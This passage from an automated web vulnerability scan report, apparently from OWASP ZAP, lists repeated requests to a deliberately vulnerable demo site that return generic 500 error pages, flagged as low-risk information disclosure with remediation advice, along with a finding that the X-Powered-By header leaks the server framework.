error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:20 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:21 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:12 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | POST |
Parameter | |
Attack | |
Evidence | Internal server error |
Request Header - size: 513 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
Instances | 89 |
Solution |
Disable debugging messages before pushing to production.
|
Reference | |
Tags |
OWASP_2021_A01
WSTG-v42-ERRH-01 OWASP_2017_A03 |
CWE Id | 200 |
WASC Id | 13 |
Plugin Id | 10023 |
Low |
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) |
---|---|
Description |
The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
|
URL | http://testasp.vulnweb.com |
Method | GET |
Parameter | |
Attack | |
Evidence | X-Powered-By: ASP.NET |
Request Header - size: 213 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache |
Request Body - size: 0 bytes. |
|
Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD; path=/ X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3541 |
Response Body - size: 3,541 bytes. |
